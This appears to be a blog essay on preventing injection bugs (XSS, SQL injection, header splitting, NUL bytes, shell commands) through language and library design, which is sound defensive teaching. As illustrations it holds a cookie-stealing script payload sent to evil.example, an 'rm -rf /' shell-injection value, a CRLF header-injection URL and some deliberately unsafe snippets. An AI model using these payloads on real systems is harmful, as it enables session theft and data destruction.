The two biggest threats to the web are caused by the same underlying mistake. It is time this problem was fixed at its root. This article will attempt to provide the tools to do so.

Input sanitation, input filtering or output escaping?

The Open Web Application Security Project (OWASP) does a great job at educating people and suggesting practical solutions to avoid common weaknesses. Unfortunately, most security bloggers focus on vulnerabilities rather than the prevention of attacks, and those who do write about prevention often give bad advice. For example, common advice is to avoid XSS (cross-site scripting) and SQL injection bugs by "sanitizing" or "validating" input. Now, by itself this is good advice.

Unfortunately, the phrase "sanitize your inputs" is often misunderstood and the advice itself can be misguided. For example, Chris Shiflett says:

 If you reject [anything but alphanumerics], Berners-Lee and O'Reilly will be
 rejected, despite being valid last names.   However, this problem is easily
 resolved.  A quick change to also allow single quotes and hyphens is all you
 need to do.  Over time, your input filtering techniques will be perfected.

I think this advice is a little unhealthy. Those are valid names, and rejecting them will only scare away customers and reinforce the idea that the "security Nazis" are out to inconvenience people. I wish people would place less emphasis on filtering and sanitizing. Citing the well-known XKCD comic has become a cliché which, funny as it is, only makes matters worse.

Validating and sanitizing input is good when it means parsing input into meaningful values as soon as you receive it, so that you don't, say, get a URL when you are expecting an integer. The horror story of ROBCASHFLOW shows how important input restrictions can be (but see also this cautionary list. Tl;dr: you're doomed either way).
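
In PHP, for example, turning a request parameter into a real integer the moment it arrives could look like this (a minimal sketch; the topic_id parameter is made up for illustration):

$raw = isset($_GET['topic_id']) ? $_GET['topic_id'] : '';
// FILTER_VALIDATE_INT yields the integer, or false for anything else,
// so the rest of the code never handles a raw, untrusted string.
$topic_id = filter_var($raw, FILTER_VALIDATE_INT);
if ($topic_id === false) {
  die('Invalid topic id');
}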

However, input sanitation will (in general) not prevent XSS or SQL injection. The OWASP XSS prevention "cheat-sheet" recognizes input validation and sanitation for what it is: a good secondary security measure in a broader "defense in depth" strategy.

Instead, there are only two correct ways to prevent "injection" bugs. The best way, often omitted from advice altogether, is to sidestep the problem entirely (see below). The other is to escape output. Unfortunately, advice to escape often seems to imply that you should manually call escaping procedures: "just use mysql_real_escape_string()". This is a very bad idea; it's tedious, it's easy to forget, it makes code less readable and it requires everyone working on the code to be equally well-informed about security issues (a great idea, but not very realistic).

Let's investigate how we can prevent these vulnerabilities easily and automatically. This will help us secure applications in a structural rather than an ad-hoc way.

The trouble with strings

The underlying problem of all these vulnerabilities is that a tree structure (e.g., the SQL script's AST or the HTML DOM tree) is represented as a string, and user input which should become a node in the tree is inserted into this string. If that input includes characters from the meta-language which describes the tree's structure, it can influence that structure. Here's an example:

<p>{username} said the following: {message}</p>

When message is "So you see, if a<b and c<a, then b>c.", you get output like this (depending on the browser, HTML version and phase of the moon):

Math teacher said the following: So you see, if ac.

This code is simply incorrect, and this bug will frustrate users like the math teacher. But it can also turn into a security nightmare; any punk can make you look like a fool by making your images dance around, take over your users' sessions by stealing cookies, or do much worse. The underlying reason this nonsense is possible at all is that you are mixing user input strings with HTML.
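
To make this concrete, here is roughly what such splicing looks like in PHP and how it goes wrong (a sketch; render_comment is a made-up helper, and the second call just spells out the cookie-stealing scenario):

function render_comment($username, $message) {
  // Raw strings are spliced straight into the markup, so anything in
  // $message becomes part of the document structure.
  return "<p>{$username} said the following: {$message}</p>";
}

// The math teacher's comment loses half its text...
echo render_comment('Math teacher', 'So you see, if a<b and c<a, then b>c.');

// ...and an attacker's comment runs script in every visitor's browser.
echo render_comment('punk',
  '<script>document.location="http://evil.example/?c=" + document.cookie</script>');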

In other words, you're performing string surgery on the serialized representation of a tree structure. Just stop and think how insane that really sounds! Why don't we use real data types? While researching this topic, I found an insightful article called "Safe String Theory for the Web". The author has a good grasp on the problem and comes close to the solution, but he never transcends the idea of representing everything as a string.

Many people never do, so despite the flawed concept, there are several solutions that take string splicing as a given. For instance, some frameworks have a sort of "safe HTML buffer" which automatically HTML-escapes strings. These solutions don't deal with the context problem from "Safe String Theory for the Web". There's only one built-in string type, and making it context-aware is extremely hard, maybe even impossible. Strongly typed languages have an advantage here, though!
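
A rough sketch of what such a buffer might look like in PHP (the HtmlBuffer class and its methods are invented for illustration, not taken from any particular framework):

class HtmlBuffer {
  private $html = '';

  // Text is always escaped on its way into the buffer...
  public function addText($text) {
    $this->html .= htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    return $this;
  }

  // ...while markup is appended as-is. The caller must still pick the right
  // method, and there is no way to say "this string belongs in a URL or a
  // JavaScript context": the context problem remains.
  public function addHtml($html) {
    $this->html .= $html;
    return $this;
  }

  public function __toString() {
    return $this->html;
  }
}

$buf = new HtmlBuffer();
$buf->addHtml('<p>')->addText($message)->addHtml('</p>');
echo $buf;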

Representing HTML as a tree helps prevent injection bugs, and has other advantages over automatic escaping. For example, we need to worry less about generating invalid HTML; our output is always guaranteed to be well-formed. The essence of an XSS attack is that it breaks up your document structure and re-shapes it, so well-formedness and safety are two sides of the same coin: by taking control of the HTML's shape, we also rule out XSS.

There's another, more insidious problem with splicing HTML strings, which I haven't seen discussed much either. It's another context problem; if your complex web application contains many "helper" functions, it becomes very hard to keep track of which helper functions accept HTML and which accept text. For example, is the following PHP function safe?

function render_latest_topicslist() {
  $out = '';
  foreach(Forum::latestPosts(10) as $topic) {
    $link = render_link('forum/show/'.(int)$topic['id'], $topic['title']);
    $out .= "<li>{$link}</li>";
  }
  return "<ul id=\"latest-topics\">{$out}</ul>";
}

This is (of course) a trick question. Consider:

$dest_url = ... some URL ...
$dest = htmlspecialchars($dest_url, ENT_QUOTES, 'UTF-8');
echo render_link($dest_url, "<span>Go to <em>{$dest}</em> directly.</span>");

Either this second example is wrong and the tags will come out literally (i.e., as &lt;span&gt;...&lt;/span&gt; in the HTML source), or the first example was wrong and you have an injection bug. You can't tell without consulting render_link's API documentation or implementation. With many helper procedures, how can you keep track of which accept fully formed HTML and which escape their input? What happens when a function which auto-encodes suddenly needs to be changed to accept HTML?

This style of programming results in ad-hoc security. You add escaping in just the right places, decided on a case-by-case basis. This is unsafe by default; you must remember to escape, which makes it error-prone. It's also hard to spot mistakes in this style. The alternative to ad-hoc security is structural security: a style which makes it virtually impossible to write insecure code by accident, thus eliminating entire classes of vulnerabilities.

For example, in PHP we could use the DOM library to represent an HTML tree:

function get_latest_topicslist($document) {
  $ul = $document->createElement('ul');
  $ul->setAttribute('id', 'latest-topics');

  foreach(Forum::latestPosts(10) as $topic) {
    $title = $document->createTextNode($topic['title']);
    $link = get_link($document, 'forum/show/'.(int)$topic['id'], $title);

    $li = $document->createElement('li');
    $li->appendChild($link);
    $ul->appendChild($li);
  }
  return $ul;
}

And the second example:

$contents = $document->createElement('span');
$contents->appendChild($document->createTextNode('Go to '));
$em = $document->createElement('em');
$em->appendChild($document->createTextNode($dest_url)); // pass the raw URL; the DOM escapes text on output
$contents->appendChild($em);
$contents->appendChild($document->createTextNode(' directly.'));
$link = get_link($document, $dest_url, $contents);

Unfortunately, this code is very verbose. The stuff that really matters gets lost in the noise of DOM manipulation. The advantage is that this is safe; text content cannot influence the tree structure, since the type of every function argument is enforced to be a DOM object and string contents are automatically XML-encoded on output.

Language design to the rescue!

Language design can help a great deal to improve security. For example, domain-specific languages like SXML and SSQL can save the programmer from having to remember to escape while writing most "normal", day-to-day code. This frees precious brain cycles to think about more essential things, like the program's purpose. Here's the example again, using SXML:

(define (latest-topics-list)
  `(ul (@ (id "latest-topics"))
       ,@(map (lambda (topic)
                `(li ,(make-link `("forum" "show" ,(alist-ref 'id topic))
                                 (alist-ref 'title topic))))
              (forum-latest-posts 10))))

And the second example:

(make-link destination-url `(span "Go to " (em ,destination) " directly."))

This code is safe from XSS, like the PHP DOM example. However, this code is (to a Schemer) just as readable as the naive PHP version. And, most importantly, the safety is achieved without any effort from the programmer.

This shows the immense safety and security advantages that can be gained from language design. Of course, this isn't completely foolproof: We still need to ensure URIs used in href attributes have an allowed scheme like http: or ftp: and not, say, javascript:. Note that input filtering and sanitation can help in situations like these! Also, just like with automatic escaping, strings in sub-languages (like JS or CSS) aren't automatically escaped. However, there is less "magic" involved; this is a representation for HTML, so it's obvious that only HTML meta-characters will be encoded. If we're also using DSLs for sub-languages, this auto-escaping effect can be nested, solving the "context problem" in a way automatic escaping cannot.
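
In PHP, for example, such a scheme check could look roughly like this (a sketch; the allowlist is just an example):

function safe_href($url) {
  $parts = parse_url($url);
  if ($parts === false) {
    return '#';  // refuse URLs that don't even parse
  }
  $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
  // Relative URLs have no scheme; anything else must be on a known-good
  // list, which rules out javascript:, data: and friends.
  if ($scheme !== '' && !in_array($scheme, array('http', 'https', 'ftp'), true)) {
    return '#';
  }
  return $url;
}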

SXML rewards programmers for writing safe code by making it look clean, concise, and easy to write. String splicing looks ugly and verbose in Scheme. In plain PHP it's the other way around: string splicing looks clean and simple, while DOM manipulation looks ugly. This subtly guides programmers into writing unsafe code. However, there are some PHP libraries that make safe code look clean. For example, Drupal has a "Forms API". It's a little ugly, but it's idiomatic in Drupal, which means code that uses it is considered cleaner than code that doesn't. Facebook is another attractive target for attackers, so they had to come up with a structural solution. Their solution is a language extension called XHP which adds native support for HTML literals.

These solutions are all specific to some codebase, not part of basic PHP. A framework or an existing codebase has "default" libraries, but when writing from scratch most programmers prefer to use what's available in the base language. This means a language should only include libraries that are safe by default. Otherwise, alternative safe libraries have to compete with the standard ones, which is an unfair disadvantage!

Sidestepping the SQL injection problem entirely

Even though it's possible to write safe code in almost any language if you try hard enough, the basic design of a language itself subtly influences how people will program in it by default. Consider the following example, using the Ruby PG gem:

# This code is vulnerable to SQL injection if the variables store user input
res = db.query("SELECT first, last FROM users "
               "WHERE login = '#{login}' "
               "AND customer = '#{customer}' "
               "AND department = '#{department}'")

Here we're using string interpolation, which is the expansion of variable names within a string. We saw this before, in PHP, but in Ruby an interpolation can contain arbitrary expressions, which makes the safe solution a little easier to write:

# This code is safe
res = db.query("SELECT first, last FROM users "
               "WHERE login = '#{db.escape_string(login)}' "
               "AND customer = '#{db.escape_string(customer)}' "
               "AND department = '#{db.escape_string(department)}'")

Still, it looks uglier than the first example.

The documentation says the escape_string method is considered deprecated. That's because sidestepping the problem entirely is much smarter than escaping. This is done by passing the user-supplied values completely separately ("out of band") from the SQL command string. This way, the data can't possibly influence the structure of the command. The two are kept separate even in the network protocol, so the separation is enforced all the way up to the server. As an added bonus, this is only slightly more verbose than the naive version:

# This code is even safer
res = db.query("SELECT first, last FROM users "
               "WHERE login = $1 AND customer = $2 AND department = $3",
               [login, customer, department])

This scales only to about a dozen parameters. With more, it becomes hard to mentally map the correct parameter to the correct position. A DSL can do this automatically for you. For example, Microsoft's LinqToSQL language extension seems to do this. SSQL currently auto-escapes, but it could transparently be changed to use positional parameters.
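
Named placeholders are another way around the mapping problem, short of a full DSL. PHP's PDO supports them, for instance (a sketch that assumes an existing PDO connection in $db):

$stmt = $db->prepare(
  'SELECT first, last FROM users
   WHERE login = :login AND customer = :customer AND department = :department');
// Each value is bound by name rather than by position, and never becomes
// part of the SQL string the programmer writes.
$stmt->execute(array(
  ':login'      => $login,
  ':customer'   => $customer,
  ':department' => $department,
));
$rows = $stmt->fetchAll();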

Pervasive (in)security through (bad) design

I'm not a native English speaker, so I looked up the word "interpolation" on Merriam-Webster:

 interpolate, transitive verb:
 To alter or corrupt (as a text) by inserting new or foreign matter

To corrupt, indeed!

Interpolation of user-supplied strings is rarely correct, and it puts almost any conceivable safe API at a disadvantage by making the wrong thing easier and shorter to write than the right thing. Beginners, unaware of the security risks, will try to use this "neat feature". It's put in there for a reason, right? Some people are trying to fix string interpolation, which is a noble goal but I wouldn't expect this to be adopted as the "native" string interpolation mechanism in a language any time soon.

The Ruby examples show the importance of good documentation and library design. The docs pointed us in the right direction by marking the escape_string method as deprecated. Its good design is more apparent when contrasting it with the MySQL gem, which has no support for positional arguments in query and offers only escape_string and prepare. The prepare method allows you to pass parameters separately, but it conflates value separation with statement caching and has an unwieldy API. Finally, the docs are quite sparse. Taken together, this all gently nudges developers in the direction of string interpolation by making that the easiest way to do it. Much of this is due to the design of MySQL's wire protocol, which dictates the API of the C library, which in turn guides the design of "high-level" libraries built on top of it.

I think high-level libraries should strive to abstract away unsafe or painful aspects of the lower levels. For example, the Chicken MySQL-client egg emulates value separation:

(conn (string-append "SELECT first, last FROM users "
                     "WHERE login = '?login' "
                     "AND customer = '?cust' "
                     "AND department = '?dept'")
      `((?login . ,login) (?cust . ,customer) (?dept . ,department)))

Ruby's MySQL gem could easily have done this, but its authors chose to restrict themselves to a thin layer which maps closely to the C library.

Not all is lost with crappy libraries: Abstractions can solve such problems at an even higher level. Rails can safely pass query parameters via Arel, in a database-independent way, even though MySQL is one of the back-ends. This is true for SQLAlchemy, PDO and many others.

Other examples

This section will show more examples of the same bug. They can all be structurally solved in two simple ways: Automatic escaping (by using proper data structures) or passing data separately from the control language. But let's start with one where this won't work :)

Poisoned NUL bytes

As you may know, strings in the C language are pointers to a character array terminated by a NUL (ASCII 0) byte. Many other languages represent strings as a pointer plus a length, allowing NUL "characters" to simply occur in strings, with no special meaning.

This representational mismatch can be a problem when calling C functions from these languages. In many cases, a C character array of the length of the string plus 1 is allocated, the string contents are copied from the "native" string to the array and a NUL byte is inserted at the end. This causes a reinterpretation of the string's value if it contains a NUL byte, which opens up a potential vulnerability to a "poisoned" NUL byte attack.

Let's look at a toy example in Chicken Scheme:

(define greeting "hello\x00, world!")

(define calculate-length-in-c
  (foreign-lambda int "strlen" c-string))

(print "Scheme says: " (string-length greeting))
(print "C says: " (calculate-length-in-c greeting))

As far as Scheme is concerned, the NUL byte is perfectly legal and the string's length is 14, but for C, the string ends after hello, which makes for a length of 5. There is no way in C to "escape" NUL bytes, and we can't sidestep it here, either. Our only option is to raise an error:

 Scheme says: 14
 
 Error: (##sys#make-c-string) cannot represent string with
    NUL bytes as C string: "hello\x00, world!"

This is a good example of structural security; it doesn't matter whether the programmer is caffeine-deprived, on a tight deadline or simply unaware of this particular vulnerability. He or she is protected from accidentally making this mistake because it's handled at the boundary between C and Scheme, which is exactly where it should be handled.

HTTP response splitting/Header injection

HTTP response splitting and HTTP header injection are two closely related attacks, based on a single underlying weakness.

The idea is simple: HTTP (response) headers are separated by a CRLF combination. If user input ends up in a header (like in a Location header for a redirect), this can allow an attacker to split a header in two by putting a separator in it. Let's say that http://example.com/foo gets redirected to http://example.com/blabla?q=foo.

An attacker can trick someone (or their browser) into following this link (%0d%0a is a URI-encoded CRLF pair):

 http://www.example.com/abc%0d%0aSet-Cookie%3a%20SESSION%3dwhatever-i-want

This could cause the victim's session cookie for example.com to be overwritten:

 Location: http://www.example.com/blabla?q=abc
 Set-Cookie: SESSION=whatever-i-want

This is a session fixation attack. For this particular bug, the real solution is of course to properly percent-encode the destination URI, but the general solution can be as simple as disallowing newlines in the header-setting mechanism (e.g., PHP does this since 5.1.2). Doing it in the only procedure which is capable of emitting headers is a structurally secure approach, but it won't protect against all attacks.
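
In PHP such a guard might look like this (a sketch; PHP's own header() already refuses values containing newlines, so the wrapper mainly illustrates the idea):

function emit_header($name, $value) {
  // Refuse any CR or LF so user input can never start a new header line,
  // let alone a whole new response.
  if (strpbrk($name . $value, "\r\n") !== false) {
    throw new InvalidArgumentException('Newline in HTTP header');
  }
  header($name . ': ' . $value);
}

// $q stands in for the user-supplied part of the destination.
emit_header('Location', 'http://www.example.com/blabla?q=' . rawurlencode($q));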

For example, even if we disallow newlines it is still possible to set a parameter (attribute) or a second value for a header, splitting it with a semicolon or a comma, respectively:

 Accept: text/html;q=0.5, text/{user-type}

If this is done unsafely, extra content-types can be added. They can even be given preference:

 Accept: text/html;q=0.5, text/plain;q=0.1, application/octet-stream;q=1.0

Protecting against these sorts of attacks can only be done with libraries which know each header's syntax and use rich objects to represent them. This approach is taken by intarweb and Guile's HTTP library, and is similar to representing HTML as a (DOM) tree. I'm not aware of any other libraries which use fully parsed "objects" to represent HTTP header values.
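
Even a very small "rich object" removes the temptation to splice raw strings into a header value. A hypothetical sketch in PHP (the AcceptEntry class is invented for illustration; intarweb does something comparable in Scheme):

class AcceptEntry {
  public $type;
  public $quality;

  public function __construct($type, $quality = 1.0) {
    // A conservative media-type check: a value like
    // "html;q=0.5, application/octet-stream" simply cannot be represented.
    if (!preg_match('#^[a-z0-9.+*-]+/[a-z0-9.+*-]+$#i', $type)) {
      throw new InvalidArgumentException("Not a media type: $type");
    }
    $this->type = $type;
    $this->quality = (float)$quality;
  }

  public function render() {
    return $this->quality < 1.0
      ? sprintf('%s;q=%.1f', $this->type, $this->quality)
      : $this->type;
  }
}

// The rendered line could go into, say, a curl CURLOPT_HTTPHEADER array.
$entries = array(new AcceptEntry('text/html', 0.5), new AcceptEntry('text/' . $user_type));
$line = 'Accept: ' . implode(', ', array_map(function ($e) { return $e->render(); }, $entries));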

Running subprocesses

For some reason, people often use a procedure like system() to invoke subprocesses. It's the most convenient way to quickly run a program just like you would from the command line. It passes the given string to the Unix shell, which expands globs ("wildcards") and runs the program:

(system (sprintf "echo \"~A\"" input))  ;; UNSAFE when input is e.g.:  byebye files"; rm -rf / "

Several languages have specialized syntax for invoking the shell and putting the output in a string using backticks, e.g., `echo hi`. The really bad part is that string interpolation is supported within the backtick operator, e.g., `echo Hi, "{$name}"`. This is dangerous because the shell is yet another interpreter with its own language, and we've learned by now that we shouldn't embed user input directly into a sublanguage. Here too, string interpolation makes the wrong thing very convenient, which increases the risk of abuse and bugs. After all, spaces and quotes are perfectly legal inside filenames, but when used with unsafely interpolated parameters, they will cause errors.

It is possible to escape shell arguments, but it's very tricky: no two shells provide exactly the same command language with the same meta-characters. Is your /bin/sh really bash, dash, ash, ksh or something else? It is even unspecified whether the sh used is /bin/sh.

However, a better approach is often available. Many programming languages offer an interface to one or more members of the POSIX exec() function family. These allow passing the arguments to the program in a separate array, and they don't go through the shell to invoke the program at all. This is faster and a lot more secure.

(use posix)
;; Accepts a list of arguments:
(process "echo" (list "Hello, " first-name " " last-name))

By sidestepping the problem we've made it simpler, shorter than the system call above and safer, which is our goal. In languages with string interpolation this will probably be slightly more verbose than the system() version.
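
In PHP, for instance, proc_open has accepted the command as an array since version 7.4, which likewise bypasses the shell (a sketch, reusing the first/last name values from the example above):

$descriptors = array(1 => array('pipe', 'w'));  // capture the child's stdout
// An array command (PHP 7.4+) runs the program directly, without a shell,
// so spaces, quotes and semicolons in the arguments have no special meaning.
$proc = proc_open(array('echo', 'Hello,', $first_name, $last_name), $descriptors, $pipes);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
proc_close($proc);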

There is one small problem: by eliminating a call to the shell, we've also lost the ability to easily construct pipelines. This can be done by calling several procedures, but this is way more complicated than it is in the shell language. The obvious solution to that is to design a safe DSL. This is what the Scheme Shell does with its notation for UNIX pipelines:

;; Process forms are implicitly backquoted, so ,input refers to the Scheme
;; variable; its value is echoed back verbatim, regardless of "special" characters
(define output (run/string (| (echo ,input) (caesar 5) (caesar 21))))
(display output)

Almost as convenient as the backtick operator, but without its dangers.

Summary

Language design can help us write applications which are structurally secure. We should strive to make writing the right thing easier than the wrong thing so that even naively written, quick and dirty code has some chance of being safe. To reach this goal, we can use the following approaches, in roughly decreasing order of safety:

  • "Sidestep" the issue by keeping data separated from commands.
  • Represent data in proper data structures, not strings. On output, escape where needed.
  • Use "safe buffers" which auto-escape concatenated strings.
  • If escaping or separation is impossible, raise an error on bad data.
  • If all else fails you can escape manually, but use coding conventions that make unsafe code stand out.

These approaches are your first line of defense. Besides using these, you should also filter and sanitize your input. Just don't mistake that for the fix for injection vulnerabilities!

This is the positive advice I can give you. The negative advice is simply to avoid building language or library features which make unsafe code easier to write than safe code. An example of such a feature is string interpolation, which causes more harm than good.